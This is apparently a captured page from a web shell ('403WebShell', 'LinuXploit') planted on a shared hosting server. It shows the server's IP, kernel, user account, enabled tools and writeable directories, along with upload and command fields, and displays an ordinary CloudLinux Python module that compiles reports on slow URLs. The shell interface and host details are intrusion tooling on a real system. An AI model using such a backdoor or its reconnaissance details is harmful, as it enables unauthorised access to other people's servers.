Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.135.208.236
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib/python3.11/site-packages/ssa/modules/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib/python3.11/site-packages/ssa/modules/decision_maker.py
# -*- coding: utf-8 -*-

# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2021 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

"""
This module contains DecisionMaker class
"""
__package__ = 'ssa.modules'

import json
import logging
import os
from os.path import isfile

import numpy as np

from ssa.db import setup_database
from .common import Common
from .storage import (
    iter_domains_data,
    iter_urls_data,
    get_url_durations
)
from ..configuration import load_tunables
from ..configuration.schemes import ssa_tunables_schema
from ..internal.constants import report_path
from ..internal.utils import previous_day_date, sentry_init


class DecisionMaker(Common):
    """
    SSA Decision maker implementation.
    """

    def __init__(self, engine=None):
        super().__init__()
        self.logger = logging.getLogger('decision_maker')
        self.logger.info('DecisionMaker enabled: %s', __package__)

        self.engine = engine if engine else setup_database()

    def __call__(self):
        self.logger.info('DecisionMaker started')
        self.logger.debug('DecisionMaker loaded config: %s', self.config)
        self.external_tunables = self.load_external_conf()
        self.logger.debug('DecisionMaker loaded tunables: %s',
                          self.external_tunables)
        report = self.data_processing()
        self.add_json_report(report)
        self.logger.info('DecisionMaker report: %s', report)
        return report

    @staticmethod
    def _report_file(name) -> str:
        """
        Full path to given filename in DM reports directory
        """
        return os.path.join(report_path, name)

    @property
    def current_report_file(self) -> str:
        """
        Full path to current DM report: report.json in DM reports directory
        """
        return self._report_file('report.json')

    @property
    def _empty_report(self) -> dict:
        """
        Returns empty report
        """
        return dict(date=previous_day_date(), domains=[])

    @property
    def solo_filtered_options(self) -> set:
        return {'correlation'}

    @staticmethod
    def load_external_conf():
        """Load external configuration values"""
        return load_tunables('ssa.json', ssa_tunables_schema)

    def data_processing(self) -> dict:
        """
        Going through the list of domains, for each domain we go through
        the list of urls. During data processing, we will form
        the resulting dictionary.
        """
        report = self._empty_report
        for domain_data in iter_domains_data(self.engine):
            # goes through the list of domains
            urls_data = list()
            domain_slow_reqs = 0

            domain_url_durations = dict(get_url_durations(
                self.engine, domain_data.domain_name))
            for domain_data_key, domain_data_value in iter_urls_data(self.engine,
                                                                     domain_data.domain_name,
                                                                     list(domain_url_durations.keys())):
                if self.is_ignored(domain_data_key):
                    self.logger.debug('%s ignored', domain_data_key)
                    continue
                # goes through the list of urls, "domain_total_reqs" is also here
                if domain_data_key not in self.non_url_fields:
                    # domain_data_key below - it is current url
                    if not self.is_throttling_suitable(
                            domain_data_value.get('url_throttled_reqs',
                                                  list([0] * 24)),
                            domain_data_value['url_total_reqs']):
                        # skip by allowed throttling percentage
                        continue
                    correlation_value = self.get_correlation(
                        domain_data_value['url_total_reqs'], domain_data.domain_total_reqs)
                    durations = domain_url_durations.get(domain_data_key)
                    if durations is None:
                        self.logger.error('Unable to get durations for %s', str(domain_data_key))
                        continue
                    if (self.request_number_exceeded(
                            domain_data_value['url_slow_reqs']) and
                            self.correlation_conditions(correlation_value)):
                        average_duration_calculation = np.mean(durations)
                        sum_url_slow_reqs = sum(
                            domain_data_value['url_slow_reqs'])
                        domain_slow_reqs += sum_url_slow_reqs
                        urls_data.append(dict(
                            name=domain_data_key, reqs_num=sum_url_slow_reqs,
                            average_duration=int(average_duration_calculation),
                            correlation=float(f'{correlation_value:.2f}')))
            if urls_data:
                sorted_urls = self.report_sorting(
                    list_to_sort=urls_data, leave_top=self.urls_number,
                    key_for_sorting='reqs_num')
                report['domains'].append(dict(
                    name=domain_data.domain_name, slow_urls=len(sorted_urls),
                    slow_reqs=domain_slow_reqs,
                    total_reqs=sum(domain_data.domain_total_reqs), urls=sorted_urls))
        if report['domains']:
            report['domains'] = self.report_sorting(
                list_to_sort=report['domains'], leave_top=self.domains_number,
                key_for_sorting='slow_reqs')
        return report

    def list_handling_considering_time(self, url_slow_reqs: list) -> list:
        """
        Based on the 'url_slow_reqs' list, a new list will be formed,
        where the elements of the original list will be iteratively
        summed by the number of elements equal to 'time'
        """
        time = self.time or 24
        return [sum(url_slow_reqs[i:time + i]) for i in
                range(0, len(url_slow_reqs), time)]

    def compare_elements_with_request_number(self,
                                             url_slow_reqs_by_time: list) -> bool:
        """
        This functions will check if any of elements is greater than "request_number"
        """
        for i in url_slow_reqs_by_time:
            if i >= self.request_number:
                return True
        return False

    def get_correlation(self, url_total_reqs: list, domain_total_reqs: list):
        """
        Calculates the correlation coefficient using the "url_total_reqs" and
        the "domain_total_reqs" lists
        """
        if not self.correlation:
            return 0
        return np.amin(np.corrcoef(url_total_reqs, domain_total_reqs))

    @staticmethod
    def report_sorting(list_to_sort: list, leave_top: int,
                       key_for_sorting: str) -> list:
        """
        Will sort the domain list by "slow_reqs", the goal is to leave only
        "domains_number" of uppers, also per each domain will sort urls by
        "reqs_num", the goal is to leave only "urls_number" of uppers.
        leave_top == 0 allows to keep the full list
        """
        list_to_sort.sort(key=lambda dict_: dict_[key_for_sorting],
                          reverse=True)
        if leave_top:
            return list_to_sort[:leave_top]
        else:
            return list_to_sort

    def rename_old_report(self):
        """
        Rename old report
        """
        old_report = self.current_report_file
        if isfile(old_report):
            with open(old_report) as json_data:
                try:
                    d = json.load(json_data)
                except json.JSONDecodeError:
                    date_from_report = 'unknown'
                else:
                    date_from_report = d.get('date', 'dd.mm.yyyy').replace('.', '_')
            new_report_name = f'report__{date_from_report}.json'
            new_report = self._report_file(new_report_name)
            os.rename(old_report, new_report)

    def add_json_report(self, report: dict):
        """
        Makes json report
        """
        self.rename_old_report()
        with open(self.current_report_file, 'w', encoding='utf-8') as f:
            json.dump(report, f, ensure_ascii=False, indent=4)

    def get_json_report(self) -> dict:
        """
        Return contents of current report or empty report in case of error
        """
        _filtering_hook = None

        try:
            with open(self.current_report_file) as report:
                report_dict = json.load(report, object_hook=_filtering_hook)
        except (OSError, json.JSONDecodeError):
            report_dict = self._empty_report
        return report_dict

    def correlation_conditions(self, correlation_value: int) -> bool:
        """
        If correlation flag is enabled - we'll compare correlation_coefficient
        from configuration with calculated correlation coefficient.
        If the calculated value exceeds the configuration value - we return
        True otherwise False. At the same time if correlation flag is disabled -
        we'll also return "True" since in this case the correlation coefficient
        is not checked and its value is specified as zero in final report.
        """
        if not self.correlation:
            return True
        return correlation_value > self.correlation_coefficient

    def request_number_exceeded(self, url_slow_reqs):
        """
        At least one element from the received list (url_slow_reqs_by_time)
        must be greater than request_number
        """
        url_slow_reqs_by_time = self.list_handling_considering_time(
            url_slow_reqs)
        return self.compare_elements_with_request_number(url_slow_reqs_by_time)

    def is_throttling_suitable(self, url_throttled_reqs: list,
                               url_total_reqs: list) -> bool:
        """
        Check that percent of throttled requests per URL passes given threshold
        """
        throttled_percent = (sum(url_throttled_reqs) / sum(
            url_total_reqs)) * 100
        self.logger.debug('Calculated throttled percent %s', throttled_percent)
        return throttled_percent <= self.external_tunables.get(
            'allowed_throttling_percentage', 0)


if __name__ == "__main__":
    sentry_init()
    logging.basicConfig(filename='decision_maker_standalone.log',
                        level=logging.INFO)
    dm = DecisionMaker()
    dm()

Youez - 2016 - github.com/yon3zu
LinuXploit